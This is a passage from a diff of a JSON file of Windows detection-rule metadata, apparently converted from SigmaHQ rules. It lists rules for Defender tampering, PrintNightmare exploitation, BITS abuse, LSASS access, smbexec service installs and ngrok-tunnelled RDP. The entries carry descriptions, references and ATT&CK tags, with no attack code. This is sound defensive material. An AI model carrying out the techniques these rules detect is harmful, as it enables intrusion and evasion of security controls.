+ "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up"
+ ],
+ "filename": "win_mssql_disable_audit_settings.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
+ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df",
+ "value": "MSSQL Disable Audit Settings"
+ },
+ {
+ "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. 
The aggregation and count function selects tasks with rare names.",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2017/03/17",
+ "falsepositive": [
+ "Software installation"
+ ],
+ "filename": "win_taskscheduler_rare_schtask_creation.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.s0111",
+ "attack.t1053.005"
+ ]
+ },
+ "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b",
+ "value": "Rare Scheduled Task Creations"
+ },
+ {
+ "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/12/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_taskscheduler_susp_task_locations.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1053.005"
+ ]
+ },
+ "uuid": "424273ea-7cf8-43a6-b712-375f925e481f",
+ "value": "Suspicious Scheduled Tasks Locations"
+ },
+ {
+ "description": "Detects plugged/unplugged USB devices",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2017/11/09",
+ "falsepositive": [
+ "Legitimate administrative activity"
+ ],
+ "filename": "win_usb_device_plugged.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/",
+ 
"https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1200"
+ ]
+ },
+ "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4",
+ "value": "USB Device Plugged"
+ },
+ {
+ "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/14",
+ "falsepositive": [
+ "Legitimate package hosted on a known and authorized remote location"
+ ],
+ "filename": "win_diagnosis_scripted_load_remote_diagcab.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/j00sean/status/1537750439701225472",
+ "https://twitter.com/nas_bench/status/1539679555908141061",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746",
+ "value": "Loading Diagcab Package From Remote Path"
+ },
+ {
+ "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired",
+ "meta": {
+ "author": "Florian Roth, Nasreddine Bencherchali",
+ "creation_date": "2022/01/20",
+ "falsepositive": [
+ "Antivirus products"
+ ],
+ "filename": "win_codeintegrity_attempted_dll_load.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/SBousseaden/status/1483810148602814466",
+ "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7",
+ "value": "Code Integrity Attempted DLL Load"
+ },
+ {
+ "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/11/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_codeintegrity_blocked_driver_load.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/wdormann/status/1590434950335320065",
+ "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1543"
+ ]
+ },
+ "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947",
+ "value": "Code Integrity Blocked Driver 
Load"
+ },
+ {
+ "description": "Detects blocked load attempts of revoked drivers",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/11/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_codeintegrity_revoked_driver.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/wdormann/status/1590434950335320065",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1543"
+ ]
+ },
+ "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1",
+ "value": "Block Load Of Revoked Driver"
+ },
+ {
+ "description": "Detects repeated failed (outgoing) attempts to mount a hidden share",
+ "meta": {
+ "author": "Fabian Franz",
+ "creation_date": "2022/08/30",
+ "falsepositive": [
+ "Legitimate administrative activity",
+ "Faulty scripts"
+ ],
+ "filename": "win_susp_failed_hidden_share_mount.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/moti_b/status/1032645458634653697",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml"
+ ],
+ "tags": [
+ "attack.t1021.002",
+ "attack.lateral_movement"
+ ]
+ },
+ "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb",
+ "value": "Failed Mounting of Hidden Share"
+ },
+ {
+ "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service",
+ "meta": {
+ "author": "Florian Roth, KevTheHermit, fuzzyf10w",
+ "creation_date": "2021/06/30",
+ "falsepositive": [
+ "Account fallback reasons (after failed login with specific account)"
+ ],
+ "filename": 
"win_susp_failed_guest_logon.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/hhlxf/PrintNightmare",
+ "https://twitter.com/KevTheHermit/status/1410203844064301056",
+ "https://github.com/afwu/PrintNightmare",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1110.001"
+ ]
+ },
+ "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262",
+ "value": "Suspicious Rejected SMB Guest Logon From IP"
+ },
+ {
+ "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/14",
+ "falsepositive": [
+ "Packages or applications being legitimately used by users or administrators"
+ ],
+ "filename": "win_shell_core_susp_packages_installed.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07",
+ "value": "Suspicious Application Installed"
+ },
+ {
+ "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.",
+ "meta": {
+ "author": "mdecrevoisier",
+ "creation_date": "2022/10/25",
+ "falsepositive": [
+ "Legitimate administrator activity"
+ ],
+ "filename": "win_sshd_openssh_server_listening_on_socket.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
+ "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
+ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
+ "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH",
+ "https://winaero.com/enable-openssh-server-windows-10/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.004"
+ ]
+ },
+ "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781",
+ "value": "OpenSSH Server Listening On Socket"
+ },
+ {
+ "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675",
+ "meta": {
+ "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton",
+ "creation_date": "2021/06/30",
+ "falsepositive": [
+ "Problems with printer drivers"
+ ],
+ "filename": "win_exploit_cve_2021_1675_printspooler.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/hhlxf/PrintNightmare",
+ "https://twitter.com/fuzzyf10w/status/1410202370835898371",
+ "https://github.com/afwu/PrintNightmare",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1569",
+ "cve.2021.1675"
+ ]
+ },
+ "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718",
+ "value": "Possible CVE-2021-1675 Print Spooler Exploitation"
+ },
+ {
+ "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675",
+ 
"meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/07/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml",
+ "level": "critical",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/MalwareJake/status/1410421967463731200",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1569",
+ "cve.2021.1675"
+ ]
+ },
+ "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a",
+ "value": "CVE-2021-1675 Print Spooler Exploitation"
+ },
+ {
+ "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"",
+ "meta": {
+ "author": "Bhabesh Raj, Nasreddine Bencherchali",
+ "creation_date": "2021/07/05",
+ "falsepositive": [
+ "Administrator might try to disable defender features during testing (must be investigated)"
+ ],
+ "filename": "win_defender_tamper_protection_trigger.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
+ "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856",
+ "value": "Microsoft Defender Tamper Protection Trigger"
+ },
+ {
+ "description": "Detects disabling Windows Defender threat protection",
+ "meta": {
+ "author": "Ján Trenčanský, frack113",
+ "creation_date": "2020/07/28",
+ "falsepositive": [
+ "Administrator actions (should be 
investigated)" + ], + "filename": "win_defender_disabled.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "value": "Windows Defender Threat Detection Disabled" + }, + { + "description": "Detects Access to LSASS Process", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/26", + "falsepositive": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "filename": "win_defender_alert_lsass_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "value": "LSASS Access Detected via Attack Surface Reduction" + }, + { + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_defender_psexec_wmi_asr.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", + "https://twitter.com/duff22b/status/1280166329660497920", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" + ] + }, + "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "value": "PSExec and WMI Process Creations Block" + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/07/06", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_exclusions.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "value": "Windows Defender Exclusions Added" + }, + { + "description": "Windows Defender logs when the history of detected infections is deleted. 
Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/13", + "falsepositive": [ + "Deletion of Defender malware detections history for legitimate reasons" + ], + "filename": "win_defender_history_delete.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", + "value": "Windows Defender Malware Detection History Deletion" + }, + { + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_exploit_guard_tamper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "value": "Windows Defender Exploit Guard Tamper" + }, + { + "description": "Detects triggering of 
AMSI by Windows Defender.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/09/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_amsi_trigger.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "value": "Windows Defender AMSI Trigger Detected" + }, + { + "description": "Detects all actions taken by Windows Defender malware detection engines", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2020/07/28", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_threat.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "value": "Windows Defender Threat Detected" + }, + { + "description": "Detects suspicious changes to the windows defender configuration", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/06", + "falsepositive": [ + "Administrator activity (must be investigated)" + ], + "filename": "win_defender_suspicious_features_tampering.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", + 
"https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "value": "Windows Defender Suspicious Configuration Changes" + }, + { + "description": "Detects the restoration of files from the defender quarantine", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/06", + "falsepositive": [ + "Legitimate administrator activity restoring a file" + ], + "filename": "win_defender_restored_quarantine_file.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "value": "Win Defender Restored Quarantine File" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_file.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", + "value": "Suspicious Download File Extension with BITS" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_powershell_job.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", + "value": "Suspicious Task Added by Powershell" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": 
"win_bits_client_susp_use_bitsadmin.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "value": "Suspicious Task Added by Bitsadmin" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_folder.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "value": "Download with BITS to Suspicious Folder" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_bits_client_susp_domain.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", + "value": "Suspicious Download with BITS from Suspicious TLD" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other legitimate domains used by software updaters" + ], + "filename": "win_bits_client_uncommon_domain.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", + "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" + }, + { + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "win_terminalservices_rdp_ngrok.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://ngrok.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "value": "Ngrok Usage with Remote Desktop Service" + }, + { + "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "meta": { + "author": "Florian Roth", + "creation_date": 
"2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_susp_dns_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", + "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" + }, + { + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "meta": { + "author": "Omer Faruk Celik", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_hack_smbexec.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", + "value": "smbexec.py Service Installation" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", + "level": "high", + 